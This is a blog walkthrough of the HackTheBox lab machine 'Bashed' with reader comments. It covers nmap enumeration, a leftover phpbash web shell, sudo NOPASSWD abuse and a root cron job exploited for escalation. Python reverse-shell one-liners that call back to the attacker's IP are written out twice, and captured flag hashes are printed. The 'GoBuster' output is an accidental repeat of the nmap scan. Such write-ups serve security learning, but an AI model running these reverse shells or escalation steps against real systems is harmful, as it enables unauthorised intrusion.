Bashed – Hackthebox
Skills Required
Basic knowledge of Linux
Enumerating ports and services
Skills Learned
Very Basic scripting
Exploiting NOPASSWD
Exploiting cron jobs
START
I checked to see what ports were open:
Scanned all ports, scan with default NSE scripts (Considered useful for discovery and safe) and what version a service is running on that port.
[root:~]# nmap -p- -sC -sV 10.10.10.68 Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-04 14:21 BST Nmap scan report for 10.10.10.68 Host is up, received echo-reply ttl 63 (0.034s latency). Not shown: 61550 closed ports, 3984 filtered ports Reason: 61550 resets and 3984 no-responses Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 31.52 seconds
Result: Port 80 is open and running Apache. There is a website called Arrexel’s Development Site.
Seeing as port 80 is open I ran this to perform HTTP enumeration using the http-enum nse script. I did this after I completed the box to see what what the command would output. From the looks of it if i did this initially i could have skipped the next step – using GoBuster.
[root:~]# nmap -Pn -p 80 --script http-enum 10.10.10.68 Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-04 12:48 BST Nmap scan report for 10.10.10.68 Host is up, received user-set (0.032s latency). PORT STATE SERVICE REASON 80/tcp open http syn-ack ttl 63 | http-enum: | /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /dev/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /php/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' |_ /uploads/: Potentially interesting folder Nmap done: 1 IP address (1 host up) scanned in 4.50 seconds
You see similar results using GoBuster.
[root:~]# nmap -Pn -p 80 --script http-enum 10.10.10.68 Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-04 12:48 BST Nmap scan report for 10.10.10.68 Host is up, received user-set (0.032s latency). PORT STATE SERVICE REASON 80/tcp open http syn-ack ttl 63 | http-enum: | /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /dev/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' | /php/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)' |_ /uploads/: Potentially interesting folder Nmap done: 1 IP address (1 host up) scanned in 4.50 seconds
Time to check out those directories. A dev directory is always interesting!!
Clicking on phpbash.php gave me a webshell. I wonder what i can do with this? My initial thoughts are uploading a reverse proxy.
www-data@bashed:/var/www/html/dev# whoami www-datawww-data@bashed:/var/www/html/dev# id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@bashed:/var/www/html/dev# ls -l total 20 -rw-r-xr-x 1 root root 4688 Dec 4 12:21 phpbash.min.php -rw-r-xr-x 1 root root 8280 Nov 30 23:56 phpbash.php
I’m logged on as www-data and have basic user privileges. I did sudo -l to see what other privileges i have access to. I am able to run commands as a user scriptmanager without a password.
www-data@bashed:/var/www/html/dev# sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL
Interesting…
Based on the /home directories there are 2 basic users on this box.
www-data@bashed:/var/www/html/dev# cd /home www-data@bashed:/home# ls arrexel scriptmanager
Lets see if I can get the user flag from this shell
www-data@bashed:/home# cd arrexel www-data@bashed:/home/arrexel# ls user.txt www-data@bashed:/home/arrexel# cat user.txt 2c281f318555dbc1b856957c7147bfc1
User flag captured!
Using this shell (through firefox) was not easy. So i wanted see if i can get a reverse shell. I started a listener on my kali machine
[root:~]# nc -nlvp 5555 listening on [any] 5555 ...
And on the Firefox webshell on Bashed I ran
www-data@bashed:/# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.234",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Back on my kali machine i now had shell as www-data
[root:~]# nc -nlvp 5555 listening on [any] 5555 ... connect to [10.10.14.234] from (UNKNOWN) [10.10.10.68] 39788 /bin/sh: 0: can't access tty; job control turned off $
It looks horrible and quite limited. I spawned a new tty shell by running the following
python -c 'import pty;pty.spawn("/bin/bash")'
New prompt
www-data@bashed:/var/www/html/dev$
That looks a bit better though it doesnt really give us more functionality ( that i can tell ).
After exploring the box a bit i found this really interesting
www-data@bashed:/$ ls -l ls -l total 80 drwxr-xr-x 2 root root 4096 Dec 4 11:22 bin drwxr-xr-x 3 root root 4096 Dec 4 11:17 boot drwxr-xr-x 19 root root 4240 Apr 1 14:08 dev drwxr-xr-x 89 root root 4096 Dec 4 17:09 etc drwxr-xr-x 4 root root 4096 Dec 4 13:53 home lrwxrwxrwx 1 root root 32 Dec 4 11:14 initrd.img -> boot/initrd.img-4.4.0-62-generic drwxr-xr-x 19 root root 4096 Dec 4 11:16 lib drwxr-xr-x 2 root root 4096 Dec 4 11:13 lib64 drwx------ 2 root root 16384 Dec 4 11:13 lost+found drwxr-xr-x 4 root root 4096 Dec 4 11:13 media drwxr-xr-x 2 root root 4096 Feb 15 2017 mnt drwxr-xr-x 2 root root 4096 Dec 4 11:18 opt dr-xr-xr-x 148 root root 0 Apr 1 14:08 proc drwx------ 3 root root 4096 Dec 4 13:03 root drwxr-xr-x 18 root root 520 Apr 2 06:25 run drwxr-xr-x 2 root root 4096 Dec 4 11:18 sbin drwxrwxr-- 2 scriptmanager scriptmanager 4096 Apr 4 04:26 scripts drwxr-xr-x 2 root root 4096 Feb 15 2017 srv dr-xr-xr-x 13 root root 0 Apr 2 04:53 sys drwxrwxrwt 10 root root 4096 Apr 4 06:57 tmp drwxr-xr-x 10 root root 4096 Dec 4 11:13 usr drwxr-xr-x 12 root root 4096 Dec 4 11:20 var lrwxrwxrwx 1 root root 29 Dec 4 11:14 vmlinuz -> boot/vmlinuz-4.4.0-62-generic www-data@bashed:/$
There’s something out of place here. The /scripts directory looks strange. Its not normally a directory that is on the root of a linux file system. Also the user scriptmanager is the only one that has access (excluding root – root always has access).
www-data@bashed:/$ cd scripts cd scripts bash: cd: scripts: Permission denied www-data@bashed:/$
Just to confirm i tried to cd into the directory as www-data and got a permission denied! Dammit! I dont like not getting access to something. I need to think how I can get in.
I then remembered that I can sudo as scriptmanager, let’s use that privilege to view the /scripts directory
! Remember !
User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL www-data@bashed:/$ sudo -u scriptmanager ls -al /scripts total 16 drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 18:06 . drwxr-xr-x 23 root root 4096 Dec 4 13:02 .. -rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 17:03 test.py -rw-r--r-- 1 root root 12 Feb 13 01:45 test.txt
My thoughts at this stage were – oh no i have to do some scripting! I took a closer look at the 2 files. Test.py is owned by scriptmanager and test.txt is owned by root. I looked inside test.py and test.txt.
www-data@bashed:/$ sudo -u scriptmanager cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing!")
f.close
www-data@bashed:/$ sudo -u scriptmanager cat /scripts/test.txt
testing!
It creates a “test.txt” file and write the string “testing!” in it. But why is test.txt is owned by root while test.py is owned by scriptmanager only?
At this stage i took a guess that there is a root cron job that runs and executes any scripts in the /scripts folder.
I checked to see what cron jobs were running but I couldn’t see anything that referenced the /scripts folder.
www-data@bashed:/$ crontab -l crontab -l no crontab for www-data www-data@bashed:/$ cat /etc/crontab cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # www-data@bashed:/$
After a few days on and off poking around this box. I was confused scared and lonely. I certainly ‘Bashed’ my head off a few walls (see what I did there?). I decided to look back at the /scripts folder. I took a guess at thinking there was a cron job that i couldnt see as www-data or scriptmanager that ran any scripts in that folder.
I created a tester.py containing the following and ran a netcat listener on port 6666
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.234",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.10.14.234] from (UNKNOWN) [10.10.10.68] 55864
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
BOOM!!!!!
I have to say I didn’t think this was going to work. For my own sanity i checked to see if there was a cron job that was running which i couldn’t see as other user. Sure enough
# crontab -l * * * * * cd /scripts; for f in *.py; do python "$f"; done #
All that’s left to do now is to capture the root flag
root@bashed:/scripts# cat /root/root.txt cc4f0afe3a1026d402ba10329674a8e2
FIN
Conclusion
If you made it this far down well done. It was a fun box and I learned quite a bit from it. What I didnt put in this blog was that I used another python reverse shell to log on as scriptmanager as i got fed up typing sudo -u scriptmanager then the command. It became quite a messy procedure after a while. Upon reflection I think it would have been better just to type the sudo -u command when i needed to use it as at times I had multiple shells open and it was hard to keep track of things.
Enough of my ramblings.
Related Posts
6 Responses
Leave a Reply to rowb0t Cancel reply
This site uses Akismet to reduce spam. Learn how your comment data is processed.
Good note about the shell. I used a web shell and used ‘sudo -u scriptmanager bash’ and then just reloaded it if I ever needed it. For some reason I did find people removing my shell occasionally. Jerks haha. Great write up!
Thanks for the feedback.
I didn’t even use nmap or Gobuster for this box.
I simply opened the webpage and read the two blog posts.
One of them tells you that he developed PHPBash on this server, so I tried some possible dirs and quickly stumbled upon the shell 🙂
I have a set routine , nmap first then if I see a web server gobuster or another directory searcher.
FYI you could have issued this command from your www-data shell to become scriptmanager: sudo -i -u scriptmanager
Ah good one, I must remember that